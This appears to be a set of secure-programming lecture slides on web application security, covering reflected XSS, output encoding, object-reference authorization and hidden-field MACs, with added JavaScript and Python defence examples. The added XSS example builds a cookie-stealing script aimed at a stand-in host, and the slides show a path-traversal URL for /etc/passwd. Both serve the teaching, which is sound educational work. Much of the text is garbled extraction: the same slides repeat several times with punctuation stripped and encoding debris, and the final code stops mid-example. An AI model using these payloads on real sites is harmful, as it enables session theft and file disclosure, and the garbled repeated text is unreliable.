Reflected XSS occurs when the injected malicious code isn't stored on the server but is immediately reflected into the visited page. Suppose

http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc

dynamically makes HTML embedding title directly:

<h1>Man GCC</h1>

An attacker could use this with a malicious input (URL-encoded in the actual link)

title=<script>...</script>&program=gcc

which e.g. steals a cookie.

Exercise: Explain how this attack works in practice.

XSS Solutions

Input processing is tricky: you need to understand the data flow through the app (quoting, encoding, values passed to/from functions, databases, etc.). Hence output filtering.

Plain output: HTML encoding

É Stored data values need to be encoded to represent them in HTML (e.g. < converted to &lt; etc.)
É The encoding must match the context the value lands in: HTML text, an attribute value, a URL and a script block each need different escaping

Marked up output: complex filtering

É Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked up output: DSL

É A better approach: use a dedicated syntax (such as a wiki markup), convert to a restricted subset of HTML
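What output encoding looks like in practice, as an added example that is not code from the lecture or from any real manpage.php: a Node.js rendering of the manpage title from the reflected XSS slide, vulnerable beside fixed, with a second encoder for attribute values to show that the text encoder alone does not cover every context. The function names, the crafted link and the search box are my own constructions.

```javascript
// Added example, not from the lecture: context-aware output encoding for
// the manpage.php title. Function names and sample inputs are my own.

// Encode a value for HTML text content (between tags).
function encodeHtmlText(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Encode a value for a quoted attribute value. The quotes must be escaped
// too, otherwise "><script> closes the attribute and the tag.
function encodeHtmlAttr(s) {
  return encodeHtmlText(s).replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Parse the query string the way manpage.php would see it ("+" is a space).
function parseQuery(url) {
  return Object.fromEntries(new URL(url).searchParams);
}

// Vulnerable rendering from the slide: the query value is embedded as-is.
function renderTitleUnsafe(title) {
  return "<h1>" + title + "</h1>";
}

// Fixed rendering: encode at the point of output, for the text context.
function renderTitleSafe(title) {
  return "<h1>" + encodeHtmlText(title) + "</h1>";
}

// A field that echoes the query into an attribute needs the attribute
// encoder; encodeHtmlText alone would leave the quote in place.
function renderSearchBox(q) {
  return '<input type="text" name="q" value="' + encodeHtmlAttr(q) + '">';
}

// Constructed sample links: the benign one from the slides and a crafted
// one of the kind a reflected-XSS attacker would send to a victim.
const BENIGN_URL = "http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc";
const CRAFTED_URL = "http://mymanpages.org/manpage.php?title=" +
  encodeURIComponent("<script>document.location.replace(" +
    "'http://www.badguy.example/steal.php?what=' + document.cookie)</script>") +
  "&program=gcc";

for (const url of [BENIGN_URL, CRAFTED_URL]) {
  const title = parseQuery(url).title;
  console.log("unsafe:", renderTitleUnsafe(title));
  console.log("safe:  ", renderTitleSafe(title));
}
console.log(renderSearchBox('" onfocus="alert(1)'));
```

The point of the search box is that the choice of encoder is made by the template author at the spot where the value is written out, not by whoever validated the input earlier; a value that is safe in one context is not automatically safe in another.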

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction

A "cool" PHP script, showhtml.php:

É take a plain HTML file
É wrap it with navigation links, site style
É convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%2Fpasswd

É remote users can visit any file on the system (any file the web server's process can read)
É mistake motivates defence-in-depth

É http server should not serve up any file
É use internal web server config (separate apps)
É and external OS config (e.g. nobody user, chroot)

Authorization and object access

What was the problem here?

É the app developer (implicitly) authorized users to read documentation files he had created
É project was open source, no need for logins
É app contained no paths to files outside the project
É so no explicit authorization code was written

É but PHP code didn't check the filename returned
É showhtml.php provided access to server objects
É input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources: resolve the requested name and confirm it stays under the documentation directory (or look it up in an allow-list) before touching the filesystem.

Looking at anyonersquos bank account

<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>

É the account number in the query string is the only thing that selects whose account is shown; nothing ties it to the logged-in customer, and anyone can type a different one

Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account".

Solutions for object referencing

Re-validate

É Check authorization again
É Obvious solution, but duplicates effort

Add a data indirection

É Session-specific server-side array of account nos

<option value="1">12345678901</option>
<option value="2">12346543210</option>

É the index is resolved against the current session's array only, so a guessed index can never name another customer's account

É Similarly for file access

http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction

for many files a hash table or database could be used
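Both fixes side by side, as an added example (my own Node.js code, not from Innocent Code or the lecture): re-validation checks the submitted account number against the caller's accounts on every request, while the indirection variant stores the customer's account numbers in the session at login and resolves a small index against that array. The customers, account numbers and balances are constructed data and the session object is simplified.

```javascript
// Added example, not from Innocent Code or the lecture: the two fixes for
// show-account.asp side by side, in Node.js. Customers, accounts and
// balances are constructed data; session handling is simplified.

// Constructed data: which accounts each logged-in customer owns.
const ACCOUNTS_BY_CUSTOMER = {
  alice: ["12345678901", "12346543210"],
  bob: ["99900011122"],
};
const BALANCES = { "12345678901": 120.5, "12346543210": 4000, "99900011122": 7 };

// Own-property lookup so a user name like "constructor" cannot hit
// Object.prototype and crash or confuse the check.
function ownedAccounts(user) {
  return Object.prototype.hasOwnProperty.call(ACCOUNTS_BY_CUSTOMER, user)
    ? ACCOUNTS_BY_CUSTOMER[user] : [];
}

// Fix 1: re-validate. The account number still travels to the client, but
// every request checks it against the caller's own accounts.
function showAccountRevalidated(session, accountParam) {
  const acct = String(accountParam);
  if (!ownedAccounts(session.user).includes(acct)) return { status: 403 };
  return { status: 200, balance: BALANCES[acct] };
}

// Fix 2: indirection. Login stores the customer's account numbers in the
// session; the form only ever carries a small index into that array.
function login(user) {
  return { user, accounts: ownedAccounts(user).slice() };
}

function renderAccountOptions(session) {
  return session.accounts
    .map((acct, i) => `<option value="${i + 1}">${acct}</option>`)
    .join("\n");
}

function showAccountIndirect(session, indexParam) {
  // Parse strictly: "1" is valid; "01", "1abc", "1e0" and "-1" are not.
  if (!/^[1-9][0-9]*$/.test(String(indexParam))) return { status: 400 };
  const acct = session.accounts[Number(indexParam) - 1];
  // Anything past the end of this session's array is simply not ours.
  if (acct === undefined) return { status: 403 };
  return { status: 200, balance: BALANCES[acct] };
}

const alice = login("alice");
console.log(renderAccountOptions(alice));
console.log(showAccountIndirect(alice, "2"), showAccountIndirect(alice, "3"));
console.log(showAccountRevalidated(alice, "99900011122"));
```

The same shape serves the file case: fill the session table with the project's file names at login (or from a fixed server-side list) and let file=1 index into it; the client never sees a path at all.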

Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified

<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>

É a hidden field is only hidden from the rendered page; the client can send back any value, so here the template file read and the mail recipient are under the requester's control

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>

Solution: add a MAC constructed with a server-side secret key

<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

É the MAC must cover every field the server relies on, and should be bound to the session so one user's tag cannot be replayed by another
É compare it in constant time; a plain hash without the secret key is not a MAC, since the client can recompute it

Or could encrypt the pagename (encryption alone does not stop tampering; use an authenticated mode or keep the MAC as well)

Other authorization mistakes

Assuming requests occur in proper order

É For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
É only checking authorization on the first step

Authorization by obscurity

É Supposing that because a web page is not linked to from the main site, only people who are given it will be able to reach it

http://www.myserver.com/secretarea/privatepaper.pdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questions

URLs

É Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?

XSS

É Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

É Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts

É Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley, 2004

É The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press, 2012

as well as the named RFCs.

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 25: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 26: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 27: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 28: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 29: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Authorization and object access

What was the problem here?

É the app developer (implicitly) authorized users
  É to read documentation files he had created
  É project was open source, no need for logins
  É app contained no paths to files outside the project
  É so no explicit authorization code was written

É but the PHP code didn't check the filename returned
  É showhtml.php provided access to server objects
  É input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources.

Looking at anyone's bank account

  <form action="show-account.asp" method="get">
  Account to display:
  <select name="account">
    <option value="12345678901">12345678901</option>
    <option value="12346543210">12346543210</option>
  </select>
  <input type="submit" name="show" value="Show Account">
  </form>

The account number itself is the object reference: a user can edit the submitted value to any account number, and the server displays whatever account it is asked for.

Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account".

Solutions for object referencing

Re-validate
É Check authorization again, on every request that names the object
É Obvious solution, but duplicates effort

Add a data indirection
É Session-specific server-side array of account nos

  <option value="1">12345678901</option>
  <option value="2">12346543210</option>

  (the client only ever sees the indices; the server maps 1 and 2 back to accounts the logged-in user owns)

É Similarly for file access

  http://researchsite.ed.ac.uk/showhtml.php?file=1   (1 stands for Introduction)

É for many files, a hash table or database could be used
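The two solutions above, worked through in Python as an added example (this is not code from the lecture or from Innocent Code). It generalises the slide's per-session array to an indirection table that serves both the bank-account form and the showhtml.php file case: the browser only ever receives unguessable tokens, the token-to-object map lives in the server-side session, and the real object is re-validated against ownership data as well. The `OWNED` table, the `Session` class and the handler names are assumptions made for the example.

```python
import html
import secrets
from dataclasses import dataclass, field

# Constructed sample data (an assumption for this example): the objects each
# logged-in user is entitled to see, as the server's own records would hold them.
OWNED = {
    "alice": {"account": ["12345678901", "12346543210"],
              "file": ["Introduction.html", "Chapter1.html"]},
    "bob":   {"account": ["99900011122"], "file": []},
}


class Forbidden(Exception):
    """The request names an object this user may not reach."""


@dataclass
class Session:
    user: str
    # kind -> {opaque token -> real object name}; lives only on the server
    refs: dict = field(default_factory=dict)


def authorized(user, kind, obj):
    """Re-validate: the direct check against server-side ownership data."""
    return obj in OWNED.get(user, {}).get(kind, [])


def issue_references(session, kind):
    """Build a fresh indirection table for one form: the client receives
    unguessable tokens, the token -> object map stays in the session."""
    table = {secrets.token_urlsafe(8): obj
             for obj in OWNED.get(session.user, {}).get(kind, [])}
    session.refs[kind] = table
    return table


def render_select(session, kind, name):
    """The <select> as sent to the browser: values are tokens, not account
    numbers or file names."""
    options = "".join(
        f'<option value="{token}">{html.escape(obj)}</option>'
        for token, obj in issue_references(session, kind).items())
    return f'<select name="{name}">{options}</select>'


def resolve_reference(session, kind, submitted):
    """Map a submitted value back to a real object. A raw account number or
    file name typed in by an attacker, or a token issued to another session,
    is not in this session's table and is rejected."""
    obj = session.refs.get(kind, {}).get(submitted)
    if obj is None:
        raise Forbidden(f"unknown {kind} reference {submitted!r}")
    # Defence in depth: the table is trusted, but re-check ownership anyway.
    if not authorized(session.user, kind, obj):
        raise Forbidden(f"{kind} {obj!r} not owned by {session.user}")
    return obj


def show_account(session, submitted):
    """show-account handler: returns (status, body)."""
    try:
        return 200, f"account {resolve_reference(session, 'account', submitted)}"
    except Forbidden as e:
        return 403, str(e)


def show_html(session, submitted):
    """showhtml.php equivalent: returns (status, body)."""
    try:
        return 200, f"serving {resolve_reference(session, 'file', submitted)}"
    except Forbidden as e:
        return 403, str(e)
```

Because the table is rebuilt each time the form is rendered, a token is only valid for the session that received it; a real account number, a traversal string such as ../../etc/passwd, or a token copied from another user's page all fall through to the 403 path.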

Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified

  <form action="/cgi-bin/cgimail.exe" method="post">
  <input type="hidden" name="$File$" value="templates/feedback.txt">
  <input type="hidden" name="$To$" value="feedback@somesite.example">
  </form>

Hidden fields are ordinary request parameters: the client can change $File$ to name any file the server process can read, and $To$ to any address. Neither value needed to leave the server in the first place.

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it from modification.

Example: editing a wiki page

  <form>
  <input type="hidden" name="pagename" value="NineteenSixtiesToys">
  <textarea cols="80" rows="25" name="wpText"></textarea>
  </form>

Solution: add a MAC constructed with a server-side secret key

  <input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

When the form comes back, the server recomputes the MAC over pagename and rejects the request if it does not match. Or the pagename could be encrypted; note that encryption alone hides the value but does not stop an attacker altering it, so an authenticated encryption mode is needed for that route.
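The MAC solution carried through in Python, as an added example rather than the lecture's own code. It issues the pagename and pagemac hidden fields for the wiki edit form and verifies them on the POST. Two choices beyond the slide are assumptions of this example: the MAC input also covers the field name and the logged-in user, so a MAC cannot be replayed for a different field or by a different user, and the comparison is constant-time. The form is handled as a plain dict of submitted fields in place of a real framework request.

```python
import hashlib
import hmac
import html
import secrets

# Assumption: in a real deployment the key is generated once, stored outside
# the web root (e.g. in a secrets store) and shared by all server instances.
# It is generated at import time here only so the example runs stand-alone.
SERVER_KEY = secrets.token_bytes(32)


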